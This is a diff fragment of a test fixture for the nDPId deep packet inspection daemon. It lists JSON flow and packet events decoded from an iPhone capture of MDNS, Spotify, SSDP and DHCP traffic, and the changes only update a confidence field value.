-00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553606,"flow_last_seen":1582454553606,"flow_idle_time":200000,"flow_min_l4_payload_len":1157,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1157,"flow_avg_l4_payload_len":1157,"midstream":0,"thread_ts_msec":1582454553606,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"luca???s_imac._odisk._tcp.local"}} +00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553606,"flow_last_seen":1582454553606,"flow_idle_time":200000,"flow_min_l4_payload_len":1157,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1157,"flow_avg_l4_payload_len":1157,"midstream":0,"thread_ts_msec":1582454553606,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"luca???s_imac._odisk._tcp.local"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553607,"flow_last_seen":1582454553607,"flow_idle_time":200000,"flow_min_l4_payload_len":1157,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1157,"flow_avg_l4_payload_len":1157,"midstream":0,"thread_ts_msec":1582454553607,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02018{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1582454553607,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1219,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1219,"pkt_l4_len":1165,"thread_ts_msec":1582454553607,"pkt":"MzMAAAD7xiwDYGpkht1gBTIBBI0R\/\/6AAAAAAAAAxCwD\/\/5gamT\/AgAAAAAAAAAAAAAAAAD7FOkU6QSNi88AAIQAAAAAHgAAAAsNTHVjYeKAmXMgaU1hYwZfb2Rpc2sEX3RjcAVsb2NhbAAAEIABAAARlAA0M3N5cz13YU1BPUM0OjJDOjAzOjA2OjQ5OkZFLGFkVkY9MHg0LGFkRFQ9MHgzLGFkQ0M9MAlfc2VydmljZXMHX2Rucy1zZARfdWRwwCYADAABAAARlAACwBrAGgAMAAEAABGUAALADA1MdWNh4oCZcyBpTWFjDF9kZXZpY2UtaW5mb8AhABAAAQAAEZQAGg5tb2RlbD1pTWFjMTEsMwpvc3h2ZXJzPTE3CV9rZXJiZXJvcwpMdWNhcy1pTWFjwCYAEAABAAARlAAzMkxLREM6U0hBMS40OTI0ODBDM0VBODI4Mjc3MUEwRDI4OEYxMTFFRjlFNzUxRjk1QTYzDUx1Y2HigJlzIGlNYWMEX3NtYsAhABCAAQAAEZQAAQDAawAMAAEAABGUAALBQcFBAAwAAQAAEZQAAsEzDUx1Y2HigJlzIGlNYWMLX2FmcG92ZXJ0Y3DAIQAQgAEAABGUAAEAwGsADAABAAARlAACwX3BfQAMAAEAABGUAALBbw1MdWNh4oCZcyBpTWFjBF9zc2jAIQAQgAEAABGUAAEAwGsADAABAAARlAACwcDBwAAMAAEAABGUAALBsg1MdWNh4oCZcyBpTWFjCV9zZnRwLXNzaMAhABCAAQAAEZQAAQDAawAMAAEAABGUAALB\/MH8AAwAAQAAEZQAAsHuwAwAIYABAAAAeAAIAAAAAMAAwOnBMwAhgAEAAAB4AAgAAAAAAb3A6cFvACGAAQAAAHgACAAAAAACJMDpwbIAIYABAAAAeAAIAAAAAAAWwOnB7gAhgAEAAAB4AAgAAAAAABbA6Q1MdWNh4oCZcyBpTWFjBF9uZnPAIQAQgAEAABGUAAEAwGsADAABAAARlAACwqHCoQAMAAEAABGUAALCk8KTACGAAQAAAHgACAAAAAAIAcDpDUx1Y2HigJlzIGlNYWMPX2NvbXBhbmlvbi1saW5rwCEAEIABAAARlABYFnJwQkE9NTk6NTE6MDI6MkY6QTQ6RkYKcnBWcj0xNTIuMRFycEhJPTA3MTZkMDU5NDRhZhFycEhOPThiNTMyNDM1OWQ3ZBFycEhBPTI4ZDRiZWQ1MTc4MMBrAAwAAQAAEZQAAsLxwvEADAABAAARlAACwuPC4wAhgAEAAAB4AAgAAAAAwAPA6cDpAAGAAQAAAHgABMCoAgHA6QAcgAEAAAB4ABD+gAAAAAAAAMQsA\/\/+YGpkwAwAL4ABAAARlAAJwAwABQAAgABAwTMAL4ABAAARlAAJwTMABQAAgABAwW8AL4ABAAARlAAJwW8ABQAAgABAwbIAL4ABAAARlAAJwbIABQAAgABAwe4AL4ABAAARlAAJwe4ABQAAgABAwpMAL4ABAAARlAAJwpMABQAAgABAwuMAL4ABAAARlAAJwuMABQAAgABAwOkAL4ABAAAAeAAIwOkABEAAAAgAACkFoAAAEZQAEgAEAA4AAMQsAwZJ\/sYsA2BqZA=="} -00704{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553607,"flow_last_seen":1582454553607,"flow_idle_time":200000,"flow_min_l4_payload_len":1157,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1157,"flow_avg_l4_payload_len":1157,"midstream":0,"thread_ts_msec":1582454553607,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"luca???s_imac._odisk._tcp.local"}} +00704{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553607,"flow_last_seen":1582454553607,"flow_idle_time":200000,"flow_min_l4_payload_len":1157,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1157,"flow_avg_l4_payload_len":1157,"midstream":0,"thread_ts_msec":1582454553607,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"luca???s_imac._odisk._tcp.local"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553607,"flow_last_seen":1582454553607,"flow_idle_time":200000,"flow_min_l4_payload_len":1186,"flow_max_l4_payload_len":1186,"flow_tot_l4_payload_len":1186,"flow_avg_l4_payload_len":1186,"midstream":0,"thread_ts_msec":1582454553607,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02025{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1582454553607,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1228,"pkt_l4_len":1194,"thread_ts_msec":1582454553607,"pkt":"AQBeAAD72DBiVgAcCABFAAS+xrMAAP8Rg6ip\/uHY4AAA+xTpFOkEqgnaAACEAAAAACAAAAAKDUx1Y2HigJlzIGlNYWMGX29kaXNrBF90Y3AFbG9jYWwAABCAAQAAEZQANDNzeXM9d2FNQT1DNDoyQzowMzowNjo0OTpGRSxhZFZGPTB4NCxhZERUPTB4MyxhZENDPTAJX3NlcnZpY2VzB19kbnMtc2QEX3VkcMAmAAwAAQAAEZQAAsAawBoADAABAAARlAACwAwNTHVjYeKAmXMgaU1hYwxfZGV2aWNlLWluZm\/AIQAQAAEAABGUABoObW9kZWw9aU1hYzExLDMKb3N4dmVycz0xNwlfa2VyYmVyb3MKTHVjYXMtaU1hY8AmABAAAQAAEZQAMzJMS0RDOlNIQTEuNDkyNDgwQzNFQTgyODI3NzFBMEQyODhGMTExRUY5RTc1MUY5NUE2Mw1MdWNh4oCZcyBpTWFjBF9zbWLAIQAQgAEAABGUAAEAwGsADAABAAARlAACwUHBQQAMAAEAABGUAALBMw1MdWNh4oCZcyBpTWFjC19hZnBvdmVydGNwwCEAEIABAAARlAABAMBrAAwAAQAAEZQAAsF9wX0ADAABAAARlAACwW8NTHVjYeKAmXMgaU1hYwRfc3NowCEAEIABAAARlAABAMBrAAwAAQAAEZQAAsHAwcAADAABAAARlAACwbINTHVjYeKAmXMgaU1hYwlfc2Z0cC1zc2jAIQAQgAEAABGUAAEAwGsADAABAAARlAACwfzB\/AAMAAEAABGUAALB7sAMACGAAQAAAHgACAAAAADAAMDpwTMAIYABAAAAeAAIAAAAAAG9wOnBbwAhgAEAAAB4AAgAAAAAAiTA6cGyACGAAQAAAHgACAAAAAAAFsDpwe4AIYABAAAAeAAIAAAAAAAWwOkNTHVjYeKAmXMgaU1hYwRfbmZzwCEAEIABAAARlAABAMBrAAwAAQAAEZQAAsKhwqEADAABAAARlAACwpPCkwAhgAEAAAB4AAgAAAAACAHA6Q1MdWNh4oCZcyBpTWFjD19jb21wYW5pb24tbGlua8AhABCAAQAAEZQAWBZycEJBPTU5OjUxOjAyOjJGOkE0OkZGCnJwVnI9MTUyLjERcnBIST0wNzE2ZDA1OTQ0YWYRcnBITj04YjUzMjQzNTlkN2QRcnBIQT0yOGQ0YmVkNTE3ODDAawAMAAEAABGUAALC8cLxAAwAAQAAEZQAAsLjwuMAIYABAAAAeAAIAAAAAMADwOkDMjE2AzIyNQMyNTQDMTY5B2luLWFkZHIEYXJwYQAADIABAAAAeAACwOnA6QABgAEAAAB4AASp\/uHYwAwAL4ABAAARlAAJwAwABQAAgABAwTMAL4ABAAARlAAJwTMABQAAgABAwW8AL4ABAAARlAAJwW8ABQAAgABAwbIAL4ABAAARlAAJwbIABQAAgABAwe4AL4ABAAARlAAJwe4ABQAAgABAwpMAL4ABAAARlAAJwpMABQAAgABAwuMAL4ABAAARlAAJwuMABQAAgABAw5UAL4ABAAAAeAAGw5UAAgAIwOkAL4ABAAAAeAAFwOkAAUAAACkFoAAAEZQAEgAEAA4AAMQsAwZJ\/tgwYlYAHA=="} -00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553607,"flow_last_seen":1582454553607,"flow_idle_time":200000,"flow_min_l4_payload_len":1186,"flow_max_l4_payload_len":1186,"flow_tot_l4_payload_len":1186,"flow_avg_l4_payload_len":1186,"midstream":0,"thread_ts_msec":1582454553607,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"luca???s_imac._odisk._tcp.local"}} +00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553607,"flow_last_seen":1582454553607,"flow_idle_time":200000,"flow_min_l4_payload_len":1186,"flow_max_l4_payload_len":1186,"flow_tot_l4_payload_len":1186,"flow_avg_l4_payload_len":1186,"midstream":0,"thread_ts_msec":1582454553607,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"luca???s_imac._odisk._tcp.local"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454556158,"flow_last_seen":1582454556158,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454556158,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1582454556158,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1582454556158,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABITwkAAEARpUvAqAIBwKgC\/+EV4RUANNgcU3BvdFVkcDDcFXQoLlJiTAABAARIlcIDokHeIIm5eNggVkvVDJHA6KPmCng="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454556158,"flow_last_seen":1582454556158,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454556158,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454556158,"flow_last_seen":1582454556158,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454556158,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00918{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1582454559629,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":404,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":404,"pkt_l4_len":370,"thread_ts_msec":1582454559629,"pkt":"AQBeAAD7xiwDYGpkCABFAAGGV\/AAAP8RvtHAqAIB4AAA+xTpFOkBcvWXAAAAAAARAAEAAAABCF9haXJwb3J0BF90Y3AFbG9jYWwAAAwAAQ9fY29tcGFuaW9uLWxpbmvAFQAMAAENX2FwcGxlLW1vYmRldsAVAAwAAQg4ZmIyMDdkZQRfc3ViDl9hcHBsZS1tb2JkZXYywBUADAABD19hcHBsZS1wYWlyYWJsZcAVAAwAAQtfZ29vZ2xlY2FzdMAVAAwAAQZfdXNjYW7AFQAMAAEHX3VzY2Fuc8AVAAwAAQdfaXBwdXNiwBUADAABCF9zY2FubmVywBUADAABBF9pcHDAFQAMAAEFX2lwcHPAFQAMAAEIX3ByaW50ZXLAFQAMAAEPX3BkbC1kYXRhc3RyZWFtwBUADAABBF9wdHDAFQAMAAEEX3JmYsAVAAwAAQZfYWRpc2vAFQAMAAHAJQAMAAEAAA4KABANTHVjYeKAmXMgaU1hY8AlAAApBaAAABGUABIABAAOAADELAMGSf7GLANgamQ="} 00952{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1582454559629,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":424,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":424,"pkt_l4_len":370,"thread_ts_msec":1582454559629,"pkt":"MzMAAAD7xiwDYGpkht1gBTIBAXIR\/\/6AAAAAAAAAxCwD\/\/5gamT\/AgAAAAAAAAAAAAAAAAD7FOkU6QFyac0AAAAAABEAAQAAAAEIX2FpcnBvcnQEX3RjcAVsb2NhbAAADAABD19jb21wYW5pb24tbGlua8AVAAwAAQ1fYXBwbGUtbW9iZGV2wBUADAABCDhmYjIwN2RlBF9zdWIOX2FwcGxlLW1vYmRldjLAFQAMAAEPX2FwcGxlLXBhaXJhYmxlwBUADAABC19nb29nbGVjYXN0wBUADAABBl91c2NhbsAVAAwAAQdfdXNjYW5zwBUADAABB19pcHB1c2LAFQAMAAEIX3NjYW5uZXLAFQAMAAEEX2lwcMAVAAwAAQVfaXBwc8AVAAwAAQhfcHJpbnRlcsAVAAwAAQ9fcGRsLWRhdGFzdHJlYW3AFQAMAAEEX3B0cMAVAAwAAQRfcmZiwBUADAABBl9hZGlza8AVAAwAAcAlAAwAAQAADgoAEA1MdWNh4oCZcyBpTWFjwCUAACkFoAAAEZQAEgAEAA4AAMQsAwZJ\/sYsA2BqZA=="} 00918{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1582454559629,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":404,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":404,"pkt_l4_len":370,"thread_ts_msec":1582454559629,"pkt":"AQBeAAD72DBiVgAcCABFAAGGSisAAP8RA2mp\/uHY4AAA+xTpFOkBciW4AAAAAAARAAEAAAABCF9haXJwb3J0BF90Y3AFbG9jYWwAAAwAAQ9fY29tcGFuaW9uLWxpbmvAFQAMAAENX2FwcGxlLW1vYmRldsAVAAwAAQg4ZmIyMDdkZQRfc3ViDl9hcHBsZS1tb2JkZXYywBUADAABD19hcHBsZS1wYWlyYWJsZcAVAAwAAQtfZ29vZ2xlY2FzdMAVAAwAAQZfdXNjYW7AFQAMAAEHX3VzY2Fuc8AVAAwAAQdfaXBwdXNiwBUADAABCF9zY2FubmVywBUADAABBF9pcHDAFQAMAAEFX2lwcHPAFQAMAAEIX3ByaW50ZXLAFQAMAAEPX3BkbC1kYXRhc3RyZWFtwBUADAABBF9wdHDAFQAMAAEEX3JmYsAVAAwAAQZfYWRpc2vAFQAMAAHAJQAMAAEAAA4KABANTHVjYeKAmXMgaU1hY8AlAAApBaAAABGUABIABAAOAADELAMGSf7YMGJWABw="} @@ -31,63 +31,63 @@ 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1582454583649,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1582454583649,"pkt":"AQBeAAD7xiwDYGpkCABFAABJLHMAAAER6YzAqAIB4AAA+xTpFOkANQrOAAAAAAABAAAAAAAAEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAAB"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454585624,"flow_last_seen":1582454585624,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454585624,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1582454585624,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1582454585624,"pkt":"AQBef\/\/62DBiVgAcCABFAACab\/sAAP8Rz4Wp\/uHY7\/\/\/+ux6B2wAhmGgTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454585624,"flow_last_seen":1582454585624,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454585624,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454585624,"flow_last_seen":1582454585624,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454585624,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454585625,"flow_last_seen":1582454585625,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454585625,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1582454585625,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1582454585625,"pkt":"AQBef\/\/6xiwDYGpkCABFAACaYI8AAAERpiDAqAIB7\/\/\/+sjTB2wAhk51TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454585625,"flow_last_seen":1582454585625,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454585625,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454585625,"flow_last_seen":1582454585625,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454585625,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1582454586170,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1582454586170,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIdggAAEARfkzAqAIBwKgC\/+EV4RUANNgcU3BvdFVkcDDcFXQoLlJiTAABAARIlcIDokHeIIm5eNggVkvVDJHA6KPmCng="} 00953{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1582454586688,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":424,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":424,"pkt_l4_len":370,"thread_ts_msec":1582454586688,"pkt":"MzMAAAD7xiwDYGpkht1gBTIBAXIR\/\/6AAAAAAAAAxCwD\/\/5gamT\/AgAAAAAAAAAAAAAAAAD7FOkU6QFyhM0AAAAAABEAAQAAAAEIX2FpcnBvcnQEX3RjcAVsb2NhbAAADAABD19jb21wYW5pb24tbGlua8AVAAwAAQ1fYXBwbGUtbW9iZGV2wBUADAABCDhmYjIwN2RlBF9zdWIOX2FwcGxlLW1vYmRldjLAFQAMAAEPX2FwcGxlLXBhaXJhYmxlwBUADAABC19nb29nbGVjYXN0wBUADAABBl91c2NhbsAVAAwAAQdfdXNjYW5zwBUADAABB19pcHB1c2LAFQAMAAEIX3NjYW5uZXLAFQAMAAEEX2lwcMAVAAwAAQVfaXBwc8AVAAwAAQhfcHJpbnRlcsAVAAwAAQ9fcGRsLWRhdGFzdHJlYW3AFQAMAAEEX3B0cMAVAAwAAQRfcmZiwBUADAABBl9hZGlza8AVAAwAAcAlAAwAAQAADe8AEA1MdWNh4oCZcyBpTWFjwCUAACkFoAAAEZQAEgAEAA4AAMQsAwZJ\/sYsA2BqZA=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595352,"flow_last_seen":1582454595352,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454595352,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.17","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 